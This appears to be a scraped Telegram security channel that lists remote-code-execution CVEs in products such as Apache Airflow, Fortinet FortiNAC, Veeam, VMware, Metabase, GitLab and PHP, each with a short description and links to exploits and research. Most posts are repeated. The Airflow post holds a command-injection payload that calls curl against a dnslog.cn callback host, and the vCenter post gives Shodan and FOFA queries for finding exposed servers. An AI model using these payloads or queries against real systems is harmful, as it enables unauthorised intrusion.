💨 Apache Airflow RCE
Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.
PoC:
1. Active
2. Run ID parameter
Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.
PoC:
1. Active
example_bash_operator at DAGs2. Run ID parameter
{"test":"\";curl `id -u`.xxx.dnslog.cn;\""}
#apache #airflow #dags #rce❤🔥5
💥 Fortinet FortiNAC Unauthenticated RCE
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve
🔥4👍2❤1
Veeam Backup and Replication (CVE-2023-27532)
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
Exploit 3 (RCE):
https://github.com/puckiestyle/CVE-2023-27532-RCE-Only
#veeam #credentials #rce #cve
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532
Exploit 2:
https://github.com/horizon3ai/CVE-2023-27532
Exploit 3 (RCE):
https://github.com/puckiestyle/CVE-2023-27532-RCE-Only
#veeam #credentials #rce #cve
🔥7👍2👎2
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 VMware vRealize Network Insight — Pre-authenticated RCE (CVE-2023-20887)
This post will examine the exploitation process of CVE-2023-20887 in VMware Aria Operations for Networks (formerly known as vRealize Network Insight). This vulnerability comprises a chain of two issues leading to Remote Code Execution (RCE) that can be exploited by unauthenticated attackers.
Exploit:
https://github.com/sinsinology/CVE-2023-20887
Research:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
#VMware #vRealize #rce #cve
This post will examine the exploitation process of CVE-2023-20887 in VMware Aria Operations for Networks (formerly known as vRealize Network Insight). This vulnerability comprises a chain of two issues leading to Remote Code Execution (RCE) that can be exploited by unauthenticated attackers.
Exploit:
https://github.com/sinsinology/CVE-2023-20887
Research:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/
#VMware #vRealize #rce #cve
🔥3
Ⓜ️ Metabase Pre-auth RCE
Earlier this week, it was reported that Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 has a vulnerability that allows attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646.
Research:
https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
PoC:
https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
#metabase #cve #poc #rce
Earlier this week, it was reported that Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 has a vulnerability that allows attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. This vulnerability was designated as CVE-2023-38646.
Research:
https://blog.calif.io/p/reproducing-cve-2023-38646-metabase
PoC:
https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
#metabase #cve #poc #rce
🔥8👍1
⚔️ GitLab CE/EE Preauth RCE (CVE-2021-22205)
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
❗️Affect Versions:
https://github.com/inspiringz/CVE-2021-22205
#gitlab #rce #cve
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
❗️Affect Versions:
>=11.9, <13.8.8🌐 Source:
>=13.9, <13.9.6
>=13.10, <13.10.3
https://github.com/inspiringz/CVE-2021-22205
#gitlab #rce #cve
🔥4❤🔥2👍1
A recently discovered vulnerability, CVE-2023-36845, affects Juniper SRX firewalls and EX switches, allowing for remote code execution without writing to the disk
🔍 Scanner:
https://github.com/vulncheck-oss/cve-2023-36845-scanner
🌐 Research:
https://vulncheck.com/blog/juniper-cve-2023-36845
#juniper #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥8❤1👍1
🔥 Bitrix24 Multiple Vulnerabilities
Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.
🌐 Details and PoC's:
🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)
#bitrix24 #rce #xss #dos #idor
Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.
🌐 Details and PoC's:
🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)
#bitrix24 #rce #xss #dos #idor
🔥16👍3❤🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-4577: PHP CGI Argument Injection (RCE)
PoC: https://github.com/watchtowrlabs/CVE-2024-4577
Blog: blog1 & blog2
#exploit #rce
on Windows
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
PoC: https://github.com/watchtowrlabs/CVE-2024-4577
Blog: blog1 & blog2
#exploit #rce
GitHub
GitHub - watchtowrlabs/CVE-2024-4577: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC - watchtowrlabs/CVE-2024-4577
🔥8👍3👎1
🔥 VMware vCenter Server RCE + PrivEsc
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
FOFA
#vmware #vcenter #rce #lpe #cve
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
product:"VMware vCenter Server"
FOFA
app="vmware-vCenter"
#vmware #vcenter #rce #lpe #cve
🔥12👍3